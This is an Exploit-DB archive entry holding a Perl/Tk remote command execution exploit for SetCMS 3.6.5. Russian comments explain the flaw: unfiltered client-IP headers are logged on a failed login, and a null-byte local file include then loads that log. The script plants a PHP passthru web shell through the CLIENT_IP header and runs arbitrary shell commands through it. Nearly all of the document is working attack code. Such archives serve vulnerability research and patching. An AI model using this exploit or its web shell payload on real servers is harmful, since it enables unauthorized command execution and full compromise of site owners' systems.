SetCMS 3.6.5 - Remote Command Execution

EDB-ID:

4962

CVE:

2008-0478

EDB Verified:

Author:

RST/GHC

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-01-22

Vulnerable App: 
#!/usr/bin/perl

## SetCMS v3.6.5 (setcms.org) remote commands execution exploit by RST/GHC
## o4.o9.2oo6
## (c)oded by 1dt.w0lf

## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
## KEEP IT PRIVATE

## про багу:
##
## file: functions.php
##
## FUNCTION ip(){
## global $user_id;
## if(getenv('HTTP_CLIENT_IP')) {$user_ip = getenv('HTTP_CLIENT_IP');}
## elseif(getenv('HTTP_X_FORWARDED_FOR')){$user_ip = getenv('HTTP_X_FORWARDED_FOR');}
## elseif(getenv('REMOTE_ADDR')) {$user_ip = getenv('REMOTE_ADDR');}
## else{$user_ip='unknown';}
## if(15 < strlen($user_ip))
## {
## $ar = split(', ', $user_ip);
## for($i=0; $i < sizeof($ar); $i++)
## {
## if($ar[$i]!='' and !ereg('[a-zA-Z]', $ar[$i])){$user_ip = $ar[$i]; break; }
## if($i==sizeof($user_ip_pass)-1){$user_ip = 'unknown';}
## }
## }
## if(ereg('unknown', $user_ip) and $user_id!=''){ $user_ip .= $user_id; }
## return $user_ip;
## }
##
## таким образом заголовки HTTP не фильтруются и можно передать необходимые данные в CLIENT_IP или X_FORWARDED_FOR
## ... далее
##
## file: modules/users/index.php
##
## if ($mc == "enter" && (!isset($do) || $do == ""))
## {
## ...
## if ($enter == "0")
## {
## $fp = fopen("files/enter.set", "a+");
## flock($fp, LOCK_EX);
## fwrite($fp, "$date::".regreplace($_POST['login'])."::".regreplace($_POST['pass'])."::$ip::\r\n");
## flock($fp, LOCK_UN);
## fclose($fp);
## $text.= "<center>Неправильное сочетание имени пользователя и пароля. Информация о вашей попытке входа записана в лог-файл.</center>";
##
## При неудачной попытке входа, отправленные данные записываются в файл files/enter.set, включая $ip =)
##
## И заканчивая
##
## file: index.php
##
## $set = $_GET['set'];
## ...
## //urls
## if (file_exists("modules/$set/index.php"))
## {
## if(file_exists("modules/$set/config.php")){include("modules/$set/config.php");}
## include("modules/$set/index.php");
## }
##
## Локальный инклуд налицо =)
## index.php?set=../files/enter.set%00
## Правда при условии magic = off
##
## eof

use Tk;
use Tk::Menu;
use LWP::UserAgent;
use Tk::DialogBox;

$top = MainWindow->new();
$top->resizable(0,0);

$path = 'http://server/setcms/index.php';
$cmd = 'id; uname -a; ls -la';
$xpl = LWP::UserAgent->new() or die;

$top->title("r57setcms365");
Dialog2::ui($top);

Dialog2::run() if defined &Dialog2::run;

Tk::MainLoop();

sub Dialog2::ui {
our($root) = @_;


# Widget Initialization
$_entry_1 = $root->Entry(
-font => 'Verdana 8',
-relief => "groove",
-textvariable => \$path,
-width => 0,
);
$_entry_2 = $root->Entry(
-font => 'Verdana 8',
-relief => "groove",
-textvariable => \$cmd,
-width => 0,
);
our($_label_1) = $root->Label(
-font => 'Verdana 8',
-text => "Path to index.php : ",
);
our($_label_2) = $root->Label(
-font => 'Verdana 8',
-text => "Command for execute : ",
);
our($_label_3) = $root->Label(
-font => 'Verdana 8',
-text => " >>> SetCMS 3.6.5 RCE sploit by RST/GHC",
);
our($_button_1) = $root->Button(
-font => 'Verdana 8 bold',
-relief => "groove",
-text => "Execute command",
);
our($_button_2) = $root->Button(
-font => 'Verdana 8 bold',
-relief => "groove",
-text => "Create shell",
);
$_text_1 = $root->Text(
-font => 'Verdana 8',
-height => 0,
-relief => "groove",
-width => 0,
);
our($_label_4) = $root->Label(
-font => 'Verdana 8',
-text => " (c)oded by 1dt.w0lf , RST/GHC , o4/o9/2oo6 , priv8",
);

# widget commands


$_button_1->configure(
-command => \&execute
);
$_button_2->configure(
-command => \&create_shell
);


# Geometry Management
$_entry_1->grid(
-in => $root,
-column => 2,
-row => 2,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "ew"
);
$_entry_2->grid(
-in => $root,
-column => 2,
-row => 3,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "ew"
);
$_label_1->grid(
-in => $root,
-column => 1,
-row => 2,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "e"
);
$_label_2->grid(
-in => $root,
-column => 1,
-row => 3,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "e"
);
$_label_3->grid(
-in => $root,
-column => 1,
-row => 1,
-columnspan => 3,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "w"
);
$_button_1->grid(
-in => $root,
-column => 3,
-row => 4,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => ""
);
$_button_2->grid(
-in => $root,
-column => 2,
-row => 4,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "e"
);
$_text_1->grid(
-in => $root,
-column => 1,
-row => 5,
-columnspan => 3,
-ipadx => 0,
-ipady => 0,
-padx => 5,
-pady => 5,
-rowspan => 1,
-sticky => "news"
);
$_label_4->grid(
-in => $root,
-column => 1,
-row => 6,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "w"
);


# Resize Behavior
$root->gridRowconfigure(1, -weight => 0, -minsize => 6, -pad => 0);
$root->gridRowconfigure(2, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(4, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(5, -weight => 0, -minsize => 361, -pad => 0);
$root->gridRowconfigure(6, -weight => 0, -minsize => 21, -pad => 0);
$root->gridColumnconfigure(1, -weight => 0, -minsize => 110, -pad => 0);
$root->gridColumnconfigure(2, -weight => 0, -minsize => 291, -pad => 0);
$root->gridColumnconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
}

sub create_shell()
{
$_text_1->delete("0.0",'end');
$already = 0;
$res = $xpl->get($path."?set=../files/enter.set%00");
if(!$res->is_success) { &connect_error(); }
else
{
if($res->content =~ /pes_barbos/) { $already = 1; }
}
if($already) { $_text_1->insert('end', "[!] Shell already created\n"); }
else {
$res = $xpl->post($path."?set=users&mc=enter",
[
'login' => 'pes_barbos',
'pass' => 'pes_barbos',
],
'CLIENT_IP' => '86.12.56.33 <? if(isset($_POST[\'RSTGHC\'])){ echo "R57SETCMSXPL"; passthru($_POST[\'RSTGHC\']); echo "R57SETCMSXPL"; } ?>',
);
if(!$res->is_success) { &connect_error(); }
else
{
$_text_1->insert('end', "[+] Shell created!\n[+] Now you can execute commands!\n");
}
}
}

sub execute()
{
$_text_1->delete("0.0",'end');
$_text_1->insert('end',"[~] Try execute command\n");
$res = $xpl->post($path."?set=../files/enter.set%00",['RSTGHC'=>$cmd]);
if(!$res->is_success) { &connect_error(); }
else
{
@rez = split("R57SETCMSXPL",$res->content);
$_text_1->insert('end',@rez[1]);
$_text_1->insert('end',"[+] EOF\n");
}
}

sub connect_error()
{
$_text_1->insert('end', "[-] Error: ".$res->status_line."\n");
}
1;

# milw0rm.com [2008-01-22]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services